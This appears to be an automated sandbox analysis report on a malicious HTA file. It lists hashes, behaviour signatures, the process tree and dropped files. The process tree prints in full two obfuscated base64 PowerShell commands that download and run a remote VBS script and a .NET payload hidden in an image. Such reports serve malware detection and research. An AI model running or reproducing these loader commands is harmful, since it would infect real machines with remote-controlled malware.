Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
04-02-2025 19:17
Static task
static1
Behavioral task
behavioral1
Sample
shemygoodgirlwholovesmebestthignstobegoodforrmes.hta
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
shemygoodgirlwholovesmebestthignstobegoodforrmes.hta
Resource
win10v2004-20250129-en
General
-
Target
shemygoodgirlwholovesmebestthignstobegoodforrmes.hta
-
Size
14KB
-
MD5
b88c259e79f89b18020b2af11487b53e
-
SHA1
632d89122dba2718319d2ae64f3ba8b73c557614
-
SHA256
76b6dfd52c8e728a974bb6122564ca779d8811cd3160dd20557a2a2228c23974
-
SHA512
b05ad7b57c73bb5ac905fe94b2b6c951bd534d4351ee4e5fd2c9e78912b7a3c40e21b5479dc3b4cea2ccfca73e9379e40a9d39bd63f05be30c785c31717ba183
-
SSDEEP
96:fSwF8+hkwF7+h9GjQIwX7fW2fswFDwFW+hTwFB+:qsvKsKPG0b7+BsDspVsw
Malware Config
Signatures
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 2116 powershell.exe 6 1460 powershell.exe 8 1460 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 2308 cmd.exe 2116 powershell.exe -
pid Process 1460 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2116 powershell.exe 1460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2116 powershell.exe Token: SeDebugPrivilege 1460 powershell.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2972 wrote to memory of 2308 2972 mshta.exe 31 PID 2972 wrote to memory of 2308 2972 mshta.exe 31 PID 2972 wrote to memory of 2308 2972 mshta.exe 31 PID 2972 wrote to memory of 2308 2972 mshta.exe 31 PID 2308 wrote to memory of 2116 2308 cmd.exe 33 PID 2308 wrote to memory of 2116 2308 cmd.exe 33 PID 2308 wrote to memory of 2116 2308 cmd.exe 33 PID 2308 wrote to memory of 2116 2308 cmd.exe 33 PID 2116 wrote to memory of 2680 2116 powershell.exe 34 PID 2116 wrote to memory of 2680 2116 powershell.exe 34 PID 2116 wrote to memory of 2680 2116 powershell.exe 34 PID 2116 wrote to memory of 2680 2116 powershell.exe 34 PID 2680 wrote to memory of 2800 2680 csc.exe 35 PID 2680 wrote to memory of 2800 2680 csc.exe 35 PID 2680 wrote to memory of 2800 2680 csc.exe 35 PID 2680 wrote to memory of 2800 2680 csc.exe 35 PID 2116 wrote to memory of 3004 2116 powershell.exe 37 PID 2116 wrote to memory of 3004 2116 powershell.exe 37 PID 2116 wrote to memory of 3004 2116 powershell.exe 37 PID 2116 wrote to memory of 3004 2116 powershell.exe 37 PID 3004 wrote to memory of 1460 3004 WScript.exe 38 PID 3004 wrote to memory of 1460 3004 WScript.exe 38 PID 3004 wrote to memory of 1460 3004 WScript.exe 38 PID 3004 wrote to memory of 1460 3004 WScript.exe 38
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\shemygoodgirlwholovesmebestthignstobegoodforrmes.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c pOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"2⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nnle1uhq.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF8E1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF8E0.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2800
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheismybeautifulladywholovesmbeautifullad.vbs"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAGkAdABlAHIAaQB0AG4AZQBoAHQAaQB3AGUAcgB1AHQAYwBpAHAAdABzAGUAYgB5AG0AZQBlAHMALwBzAG4AawBrAC8AcABwAG0AYQB4AC8AMAAzAC4AMAAxAC4AOQAyAC4ANQA4ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAG0AdwBuAG0AZQBtAGMAbQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA4ADYANAAwADAAOQA2AC8AeAA5AGUAdwB0AGwAZQBtAGYAcABoAGYAdwB2AGYAcwA4ADMAcwBzAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgAFsAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBtAGEAaQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5c5b2b20aac4d0306b218e52c0a80f28c
SHA148f41073470f76c376f9005a2fa8358fa5149f4e
SHA256ea2601184c85bc54c6568662df493277ec325d40c0a320070ee42176f056d7a5
SHA512b51ae4ebde6d9847be0ae12787acfba0c5820972d8ff2c0e215b9e7dd624ecc4a6b49fe12a38bc63e7ff0277b786ed1b0dee479adc12d651202626c74212ba5c
-
Filesize
181KB
MD54ea6026cf93ec6338144661bf1202cd1
SHA1a1dec9044f750ad887935a01430bf49322fbdcb7
SHA2568efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA5126c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b
-
Filesize
3KB
MD5d2715fe95c7f30afd03c342b04f4d525
SHA1d8c67922598aba2c5e6deb79f9c7edbffa59e03b
SHA2561eb3874b64f577f658512d7e57ea2d2ea3233a9781d86ffcd21ae5806b512349
SHA51243d1ce442ef792dd94a7df62c4659f15bb9d3227fa2324861ced06c547ab456651d900f2f363dc0939ce2bc262d49276102fd65be1cddab02c587e76dde44248
-
Filesize
7KB
MD533917942561568d3cf629ba370e240a7
SHA184397ba6ece8eab37a2380abadc6a571dcf4d60b
SHA256207f3887b16994a4ea70b2ce7128eaa969c75220f0bc451d42636606e0669da0
SHA5123d9f902f7de6c010281240af3ad458da5d78f081f57cb25cd0fb64dd8b9f04b8b0e4d2c89e258276e5f487adfa2b51e5f3ec02d3013316b952564a0706ce1dc3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5d96538df4afa6108efeba5a8121442df
SHA1e0999e3d637040f8e0c55135fabafcca791e8005
SHA25666558c2d541afd6d1bef38a828609c0830f740d17193ec04bd0f2945620795eb
SHA5123e60b69738962d7022a3099605793b139608a08c9517df50083cfb026b631ee74dbc4ce06459c806d9283a1ccdde600f55690bad645827c2252956ba4cfb6c92
-
Filesize
209KB
MD57dcf0b4585dd514d6320f1380cdf323c
SHA19800ed24aae82b984034dab184b0a2df4a21a81e
SHA256f4f1b9da47072e15e360050cc4c3a78f6d1d7fe9c2695bd0b6680a1e2acb0987
SHA5122d9d0d25992aa555f1e17995a73c3d610b8a170bcff4921184f8d54d78c23eb4e63acbd321367f583beaec260b3dd81b0a213931be47bc11612b4460e816d4b1
-
Filesize
652B
MD5a9212162df247e626cc199c98bfae52c
SHA1d35167610cf7e9fc4628f6f0d1a0443ba6e9f237
SHA25648d05f40662e0ecf877ce3c2edf347e222929e319c2c842ffa841b27be2b7a78
SHA5121f131721dda5d2fd98dd8658e9c5ba927b93e74ce734425e5205a0b87131472685fb79167b69d53251fcf2390e9141c476312343302c645e03aeb8828613054d
-
Filesize
476B
MD55b2e7d35de72278f9da88c640f9e7481
SHA1e5d0eb3c997e4bbb1e3e9f001858a6bd34019465
SHA2565bb90192a83dd9ead0f6a41f002ac0cf6a9e4e7c3acaf08e9f8bf7b5947384c0
SHA512e335d94e966c71e40f87b4bd595ce365b54992ce97aa33b0181ded2d19ec7f8fed59540215556e78181a39a714854d33f0aa6de506df2c1fc19f35e7d7a40d56
-
Filesize
309B
MD548bea1b41b3790d8bea69202fa799039
SHA13a17b731131116b2ab7d15d9136cb153eaa1c941
SHA256d894cb762e1f425d090bdf5c186bb8f64b94bd0c51eb88843e1c492f70158051
SHA51201bfb4a21363353962d7e59db2487b53c2a005516648b25e63c20ade47e68ccbf74eaa1e3095372542cd4ecef846a93ed64090b70190a1709196c0932bf8b2c1